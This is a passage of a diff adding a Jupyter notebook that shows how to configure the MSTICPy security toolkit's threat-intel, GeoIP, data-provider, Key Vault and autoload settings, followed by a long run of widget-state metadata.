+    "mpedit.set_tab(\"TI Providers\")\n",
+    "mpedit"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Test that it works\n",
+    "\n",
+    "This assumes that you have set an enviroment variable pointed at your msticpyconfig.yaml.\n",
+    "Use the MpConfigFile tool to force MSTICPy to reload settings from the disk."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "mpconfig.refresh_mp_config()\n",
+    "\n",
+    "# import the TI module\n",
+    "from msticpy.sectools import TILookup\n",
+    "result = TILookup().lookup_ioc('ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa')\n",
+    "TILookup.result_to_df(result)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Adding GeoIP Providers\n",
+    "\n",
+    "MSTICPy supports two Geo IP providers - Maxmind GeoIPLite and IP Stack.\n",
+    "The main difference between the two is that Maxmind downloads and uses a local\n",
+    "database, while IPStack is a purely online solution.\n",
+    "\n",
+    "For either you need API keys to either download the free database from MaxMind\n",
+    "or access the IPStack online lookup\n",
+    "\n",
+    "We'll use GeoIPLite as our example.\n",
+    "You can sign up for a free account and API key at https://www.maxmind.com/en/geolite2/signup.\n",
+    "You'll need the API for the following steps.\n",
+    "- Select \"GeoIPLite\" from the **New Prov**\n",
+    "- Click **Add**\n",
+    "- Paste your Maxmind key into the **Value** field\n",
+    "\n",
+    "Set the maxmind data folder:\n",
+    "- This defaults to \"~/.msticpy\"\n",
+    "  - On Windows this translates to the foldername `%USERPROFILE%/.msticpy`.\n",
+    "  - On Linux/Mac this translates to the folder `.msticpy` in your home folder.\n",
+    "- This is where the downloaded GeopIP database will be stored.\n",
+    "- Choose another folder name and location if you prefer.\n",
+    "\n",
+    "> **Note**: as with the TI providers you can opt to store your key\n",
+    "> as an environment variable or keep it in Key Vault.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {
+    "jupyter": {
+     "source_hidden": true
+    }
+   },
+   "outputs": [],
+   "source": [
+    "mpedit.set_tab(\"GeoIP Providers\")\n",
+    "mpedit"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Test that it works"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "mpconfig.refresh_mp_config()\n",
+    "\n",
+    "from msticpy.sectools import IPStackLookup\n",
+    "geoip = IPStackLookup()\n",
+    "geoip.lookup_ip(\"52.96.165.18\")[1][0]"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "mpconfig.refresh_mp_config()\n",
+    "\n",
+    "from msticpy.sectools import GeoLiteLookup\n",
+    "geoip = GeoLiteLookup()\n",
+    "geoip.lookup_ip(\"52.96.165.18\")[1][0]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Optional Settings\n",
+    "## Other data providers - Splunk, Azure CLI, LocalData, Mordor\n",
+    "\n",
+    "### Azure API and Azure Sentinel API\n",
+    "To access Azure APIs (such as the Sentinel APIs or Azure resource APIs) \n",
+    "you need to be able to use Azure Authentication.\n",
+    "The setting is named \"AzureCLI\" for historical reasons - don't let that confuse you.\n",
+    "We currently support two ways of authenticating:\n",
+    "1.  Chained chained authentication (recommended)\n",
+    "2.  With a client app ID and secret\n",
+    "\n",
+    "The former can try up to four methods of authentication:\n",
+    "- Using creds set in environment variables\n",
+    "- Using creds available in an AzureCLI logon\n",
+    "- Using the Managed Service Identity (MSI) credentials of the machine you are\n",
+    "  running the notebook kernel on\n",
+    "- Interactive browser logon\n",
+    "\n",
+    "To use chained authentication methods select the methods to want to use and leave\n",
+    "the clientId/tenantiId/clientSecret fields empty.\n",
+    "\n",
+    "### Splunk\n",
+    "The Splunk provider has many options. Typically you need only:\n",
+    "- host (your Splunk server host name)\n",
+    "- username\n",
+    "- password\n",
+    "(You can also supply some or all of these values at startup)\n",
+    "\n",
+    "## LocalData\n",
+    "This is a data provider that reads from local CSVs or Pickled pandas DataFrames\n",
+    "\n",
+    "You can set the default data paths that it looks in for data files. This can\n",
+    "have multiple values - put each on a new line.\n",
+    "\n",
+    "## Mordor\n",
+    "The mordor provider has two options:\n",
+    "- The path to save temporary downloaded files (default is the current directory)\n",
+    "- Whether to cache files or delete them immediately after download."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "mpedit.set_tab(\"Data Providers\")\n",
+    "mpedit"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Key Vault\n",
+    "\n",
+    "You only need this if you want to store secrets in Azure Key Vault.\n",
+    "\n",
+    "You need to create the Key Vault first - do that at your Azure portal.\n",
+    "Here is the link for the \n",
+    "[global KeyVault management portal](https://ms.portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.KeyVault%2Fvaults)\n",
+    "\n",
+    "The required settings are all values that you get from the Vault properties (albeit a couple\n",
+    "of them have different names)\n",
+    "- **VaultName** is show at the top left of the properties screen\n",
+    "- **TenantId** is shown as *Directory ID*\n",
+    "- **AzureRegion** is shown as *Location*\n",
+    "- **Authority** is the cloud for your Azure service.\n",
+    "\n",
+    "> **Note**: cCurrently we've only implemented and tested \"global\" fully but if<br>\n",
+    "> you are using a regional or national cloud and this isn't working please<br>\n",
+    "> let us know [msticpy@microsoft.com](mailto:msticpy@microsoft.com) and\n",
+    "> we'll get it fixed.\n",
+    "  \n",
+    "Click **Save** and then **Save File** when you are done."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "mpedit.set_tab(\"Key Vault\")\n",
+    "mpedit"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Test Key Vault\n",
+    "\n",
+    "See if you can connect and view any secrets. Of course nothing will show\n",
+    "up if you haven't entered a secret. Add a test secret to the vault to show\n",
+    "here.\n",
+    "\n",
+    "- Refresh settings\n",
+    "- Try to connect and display secrets\n",
+    "\n",
+    "> **WARNING** ***don't leave this output in your saved notebook.***<br>\n",
+    "> If there are real secrets in the output, use the notebook **Clear output** before saving the notebook.<br>\n",
+    "> Also delete cached copies of this notebook.\n",
+    "> Look in the `.ipynb_checkpoints` sub-folder of this folder and delete copies of this notebook."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "mpconfig.refresh_mp_config()\n",
+    "mpconfig.show_kv_secrets()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Autoload QueryProvs\n",
+    "\n",
+    "This section controls which, if any query providers you want to load automatically\n",
+    "when you run `nbinit.init_notebook`.\n",
+    "\n",
+    "This can save a lot of time if you are frequently authoring new notebooks. It also\n",
+    "allows the right providers to be loaded before other components that might use them such as\n",
+    "- Pivot functions\n",
+    "- Notebooklets\n",
+    "(more about these in the next section)\n",
+    "\n",
+    "There are two types of provider support:\n",
+    "- Azure Sentinel - here you specify both the provider name and the workspace name that you want to connect to.\n",
+    "- Other providers - for other query providers, just specify the name of the provider.\n",
+    "\n",
+    "Available Azure Sentinel workspaces are taken from the items you configured in the **Azure Sentinel** tab.\n",
+    "Other providers are taken from the list of available provider types in *MSTICPy*.\n",
+    "\n",
+    "There are two options for each of these:\n",
+    "- **connect** - if this is True (checked) *MSTICPy* will try to authenticate to the\n",
+    "  provider backend immediately after loading. This assumes that you've configured\n",
+    "  credentials for the provider in your settings.\n",
+    "  Note: if this is not set it defaults to True.\n",
+    "- **alias** - when MSTICPy loads a provider it assigns it to a Python variable name.\n",
+    "  By default this is \"qry_*workspace_name*\" for Azure Sentinel providers and\n",
+    "  \"qry_*provider_name*\" for other providers. If you want to use something a bit shorter\n",
+    "  and easier to type/remember you can add a *alias*. The variable name created\n",
+    "  will be \"qry_*alias*\"\n",
+    "  \n",
+    "> **Note** if you lose track of which providers have been loaded by\n",
+    "> this mechanism they are added to the `current_providers` attribute of\n",
+    "> `msticpy`\n",
+    "```python\n",
+    "   import msticpy\n",
+    "   msticpy.current_providers\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "mpedit.set_tab(\"Autoload QueryProvs\")\n",
+    "mpedit"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Autoload Component\n",
+    "This section controls which, if other components you want to load automatically\n",
+    "when you run `nbinit.init_notebook()`.\n",
+    "\n",
+    "This includes\n",
+    "- TILookup - the Threat Intel provider library\n",
+    "- GeopIP - the Geo ip provider that you want to use\n",
+    "- AzureData - the module used to query details about Azure resources\n",
+    "- AzureSentinelAPI - the module used to query the Azure Sentinel API\n",
+    "- Notebooklets - loads notebooklets from the [msticnb package](https://msticnb.readthedocs.io/en/latest/)\n",
+    "- Pivot - pivot functions\n",
+    "\n",
+    "These are loaded in this order, since the Pivot component needs query and other providers\n",
+    "loaded in order to find the pivot functions that it will attach to entities.\n",
+    "For more information see [pivot functions](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html)\n",
+    "\n",
+    "Some components do not require any parameters (e.g. TILookup and Pivot). Others do support or require additional\n",
+    "settings:\n",
+    "\n",
+    "**GeoIpLookup**\n",
+    "\n",
+    "You must type the name of the GeoIP provider that you want to use - either \"GeoLiteLookup\" or \"IPStack\"\n",
+    "\n",
+    "**AzureData** and **AzureSentinelAPI**\n",
+    "- **auth_methods** - override the default settings for AzureCLI and connect using the selected methods\n",
+    "- **connnect** - set to false to load but not connect\n",
+    "\n",
+    "**Notebooklets**\n",
+    "\n",
+    "This has a single parameter block **AzureSentinel**. At minumum you\n",
+    "should specify the workspace name. This needs to be in the following\n",
+    "format:\n",
+    "```\n",
+    "    workspace:WORKSPACENAME\n",
+    "```\n",
+    "WORKSPACENAME must be one of the workspaces defined in the Azure Sentinel tab.\n",
+    "\n",
+    "You can also add addition parameters to send to the notebooklets init function:\n",
+    "Specify these as addition key:value pairs, separated by newlines.\n",
+    "```\n",
+    "    workspace:WORKSPACENAME\n",
+    "    providers=[\"LocalData\",\"geolitelookup\"]\n",
+    "```\n",
+    "See the \n",
+    "[msticnb `init` documentation](https://msticnb.readthedocs.io/en/latest/msticnb.html#msticnb.data_providers.init)\n",
+    "for more details\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "mpedit.set_tab(\"Autoload Components\")\n",
+    "mpedit"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Using `MpConfigFile` to check and manage your msticpyconfig.yaml\n",
+    "\n",
+    "This tool lets you:\n",
+    "- Load your default settings (pointed to by the MSTICPYCONFIG environment variable)\n",
+    "  - `mpconfig.load_default()` method or just create `mpconfig = MpConfigFile()` with no parameters\n",
+    "- Load a different settings file - `mpconfig.load_from_file(file_path)`\n",
+    "- Save the loaded config to a different file name - `mpconfig.save_to_file(file_path)`\n",
+    "- Validate the settings in the loaded file - `mpconfig.validate_settings()`\n",
+    "- Browse/Search for a file - `mpconfig.browse_for_file()`\n",
+    "- View the text of the settings file - `mpconfig.view_settings()`\n",
+    "\n",
+    "There are also a couple of utility methods:\n",
+    "- `mpconfig.show_kv_secrets()` - to view secrets in your Key Vault (more on this below)\n",
+    "- `mpconfig.map_json_to_mp_ws()` - you can load an AzureSentinel `config.json` file and map\n",
+    "  its settings into a format compatible with `msticpyconfig.yaml`\n",
+    "- `mpconfig.refresh_mp_config()` - reloads the settings for MSTICPy based on the saved default\n",
+    "  config file (this is either the file pointed to by MSTICPYCONFIG env variable or \n",
+    "  a file \"msticpyconfig.yaml\" in the current directory.\n",
+    "  \n",
+    "You can get more information on these methods by entering:\n",
+    "```\n",
+    "help(MpConfigFile)\n",
+    "```"
+   ]
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "history": [],
+  "kernelspec": {
+   "display_name": "Python (condadev)",
+   "language": "python",
+   "name": "condadev"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "latex_envs": {
+   "LaTeX_envs_menu_present": true,
+   "autoclose": false,
+   "autocomplete": true,
+   "bibliofile": "biblio.bib",
+   "cite_by": "apalike",
+   "current_citInitial": 1,
+   "eqLabelWithNumbers": true,
+   "eqNumInitial": 1,
+   "hotkeys": {
+    "equation": "Ctrl-E",
+    "itemize": "Ctrl-I"
+   },
+   "labels_anchors": false,
+   "latex_user_defs": false,
+   "report_style_numbering": false,
+   "user_envs_cfg": false
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": false,
+   "toc_position": {},
+   "toc_section_display": true,
+   "toc_window_display": false
+  },
+  "uuid": "23d61b62-20f0-4ee3-8082-4e8f03ae329c",
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {
+     "000d3c419ec345e6adaf37ac449f0446": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "00952db18b2d4de398fe9f5723ac7640": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_403d0ba13a354d9789222484693c8747",
+        "IPY_MODEL_e33b64bd8ece4c73bfe9896d8dff5a5a",
+        "IPY_MODEL_30751b67b634429593b9a2c17e41f331"
+       ],
+       "layout": "IPY_MODEL_177881e32cac4853a1ab05be79981e72"
+      }
+     },
+     "00e7f95fd5ce4486998ba74dc78d1d8f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextareaModel",
+      "state": {
+       "layout": "IPY_MODEL_a826c60a0e7343f5815869d5b4e663d0",
+       "style": "IPY_MODEL_992f4897a52742c2b31144a4025c47ce"
+      }
+     },
+     "011392be57434de68602516c5b0e639d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_757ec5abc932475cb9607d2b141992e7",
+        "IPY_MODEL_9836718176cb4d70943012533b63fd3b"
+       ],
+       "layout": "IPY_MODEL_cf10662541954e1293a3288c7caed409"
+      }
+     },
+     "011baed468674af4824e154238a531b4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Help"
+       },
+       "children": [
+        "IPY_MODEL_6382a1f897094e169fc5fa5d7df6e823"
+       ],
+       "layout": "IPY_MODEL_0271f24b3e554ecfae917396e1fe5290",
+       "selected_index": null
+      }
+     },
+     "01303a36d5474434ab629f6cc4971b41": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Open folder",
+       "layout": "IPY_MODEL_0d01fde4d675438c883256cc7e59528a",
+       "style": "IPY_MODEL_84dcbc3651b947dba3d8bc482f45b475"
+      }
+     },
+     "01635efd811a4af68961fe11767e27e6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_65d6b71187784b8391d19063427d27db",
+       "style": "IPY_MODEL_e186ee9554a643f895d2b115c2fb53cd",
+       "value": "User Defaults - Auto-loaded components"
+      }
+     },
+     "0271f24b3e554ecfae917396e1fe5290": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "0341dddbd6a04b37adf7e26328bc9be4": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "035a17995fc84ebe94534e0196b8fdb8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "99%"
+      }
+     },
+     "035f7da3f6b2462cb5a82f5da10d18cb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "layout": "IPY_MODEL_1e8ca8d8bab14d669bb930f230a97d37"
+      }
+     },
+     "03716e936e62472385944deca31916d5": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "03bb844dadea436e86b4d3fb95277aeb": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "048a2fff59c24ba1894f6d71d8071f65": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add",
+       "layout": "IPY_MODEL_a401941d9f3d4e2ca6c3460843d09506",
+       "style": "IPY_MODEL_4b8b4fd76b034472a433d14c85579aec"
+      }
+     },
+     "074322927b0348739193e78d63b7e5d8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "0751b6e7a386403383655171128c00d5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Show Key Vault secrets",
+       "layout": "IPY_MODEL_7b32d76ea7a9413b84f9f8813692cf0e",
+       "style": "IPY_MODEL_78d5f95909364288aa5517f4b7d15a21"
+      }
+     },
+     "0764eba5420f4559a30a52af853fd513": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "07fce4095bfe43079b1a1da59043282c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "09475999910f4fdea19a20b04901cb30": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "95%"
+      }
+     },
+     "09e4401dd9cc40c59272a269c96ffcff": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add",
+       "layout": "IPY_MODEL_369c91149ff749598a1b4f5c36e2c60b",
+       "style": "IPY_MODEL_1f6ddb7a2a0b488e897cd7044bdb5f73"
+      }
+     },
+     "0a153ce133234e9a858627f253cd2a4e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save",
+       "layout": "IPY_MODEL_1f39abd684a54ef9ac5d923248b498fe",
+       "style": "IPY_MODEL_31b6c1c750fe4f68bc08ae82f8c55c43"
+      }
+     },
+     "0a5f86e9c17e4643b420593ef3845cbf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "0aef220e3d5745e18034edfcc306003a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_8f6f4cb1b0f54eb2a12876a35112148d",
+        "IPY_MODEL_f7894c4c51c04535990ee02a6c4bfc6e"
+       ],
+       "layout": "IPY_MODEL_5c3e412c7daa42ea8d55c5d19ad38017"
+      }
+     },
+     "0b167cb8b1e54dd7ad6bce060c148e10": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "45%"
+      }
+     },
+     "0b6b065cc30247ff8dd1cb8fe9cdd1d4": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "0b827a2572964dc7a7584636b2e4cb32": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "0bd2627f17fe4aee808e88be607d6c77": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save",
+       "layout": "IPY_MODEL_369c91149ff749598a1b4f5c36e2c60b",
+       "style": "IPY_MODEL_d59cfa544fa74d779b0adbd644158069"
+      }
+     },
+     "0c14a900b0064a53ab7b08551adae2db": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "40%"
+      }
+     },
+     "0c2fc443e3384cdaaec719922bb0f8e1": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "75%"
+      }
+     },
+     "0c5275a51e584d889e03e632b2b8dc6e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "0c7aca941dcc466989608a358cb4b5b6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Validate Settings",
+       "layout": "IPY_MODEL_dd672cbb506449e9b0e059c2acd81aa0",
+       "style": "IPY_MODEL_b6510414c0074137bf1a1c087b247245"
+      }
+     },
+     "0d01fde4d675438c883256cc7e59528a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "0d9880fa9fea44428db6274aa690d1f1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete",
+       "layout": "IPY_MODEL_1f39abd684a54ef9ac5d923248b498fe",
+       "style": "IPY_MODEL_7d200713cb614a2895cec6b75ddc0310"
+      }
+     },
+     "0e3114edbddc4f5594d8cb50c424b96d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "0e4bfc4edcbc4ead81d3fd3597ab77e3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_01635efd811a4af68961fe11767e27e6",
+        "IPY_MODEL_5ee68e3ae41946bbbec6b7bd62df43a3",
+        "IPY_MODEL_011baed468674af4824e154238a531b4",
+        "IPY_MODEL_75f713decd474fbfad61635108533541"
+       ],
+       "layout": "IPY_MODEL_29a27659a9ad4cfcab02b9e9654f252f"
+      }
+     },
+     "0e7de0201f784d9e960416bd1de9b36c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "0ed76234419048859db9819184c3591c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_11d40aa1194f4d5eb3dc0401ee8682b7",
+        "IPY_MODEL_3440f923112d4a73b5c41c3f3283c803"
+       ],
+       "layout": "IPY_MODEL_61393cab34224ebaaa1a4c4d99fee2ba"
+      }
+     },
+     "0ee322cc4e0041dea7614fb3f4f3eac9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "1058a90b3442420ebafe4016311de687": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "130px"
+      }
+     },
+     "106a0acdebf3431ba9f220188d2026e1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "106cc280eff14bd1bd4350b249678007": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Help"
+       },
+       "children": [
+        "IPY_MODEL_9561bffca6b64899adae5acb9b1ee753"
+       ],
+       "layout": "IPY_MODEL_fe225740c8cf4042962fa6e0781d1f93",
+       "selected_index": null
+      }
+     },
+     "10802d483d6b40c4a4eb54fe278d6f84": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "40%"
+      }
+     },
+     "113d408f292444b798803a700233e6c3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_9bd6b7f9a1d44127b914a08b4af2ac1f",
+        "IPY_MODEL_a9661f9b69c44d83a72da7792d7690d6"
+       ],
+       "layout": "IPY_MODEL_f7392e3958044faa8d92caa5f2e70fc4"
+      }
+     },
+     "11d40aa1194f4d5eb3dc0401ee8682b7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_c0aec88e08f14ed7a0bff776489c93fd",
+        "IPY_MODEL_ff5e66827bea4fba8caf84500bb34b9e",
+        "IPY_MODEL_503cd98bfdb84aebac72f3ec659235d9",
+        "IPY_MODEL_e5daba79291f4652a8bed244ad6b3ec7"
+       ],
+       "layout": "IPY_MODEL_2ce9b30e25124b11ae69164a3eeb6f5a"
+      }
+     },
+     "11de4ffa64c94c15823fce87d93e18b8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "12325177d828476a926c844bdd6a852d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "64%"
+      }
+     },
+     "124998e4066b40bd997e74a960926e1a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Help"
+       },
+       "children": [
+        "IPY_MODEL_582ab6b0293241938a5443ee75b76023"
+       ],
+       "layout": "IPY_MODEL_c824c259b685424795e8b097a913675e",
+       "selected_index": null
+      }
+     },
+     "131a8d834df34ffc95a8ba0d3160c603": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_0e3114edbddc4f5594d8cb50c424b96d",
+       "style": "IPY_MODEL_13869d6728da436c8a0427297c562633",
+       "value": "Search for file in current path"
+      }
+     },
+     "137b719ede3641d3a0315dad85053d78": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_3a3f76b7cffe458ebd9370b00bed1dc5",
+       "style": "IPY_MODEL_702f85766e69418aaefd04f2217abc59",
+       "value": "Key Vault Setup"
+      }
+     },
+     "137f07f8109e4572b8c858a6a94abf2f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_23b81a4820224c27a15d0b85cceaaa01",
+        "IPY_MODEL_987722f786d340979ec0b212a7388b6f",
+        "IPY_MODEL_c555f41a9d41473ba86e555fd0541222",
+        "IPY_MODEL_75f713decd474fbfad61635108533541"
+       ],
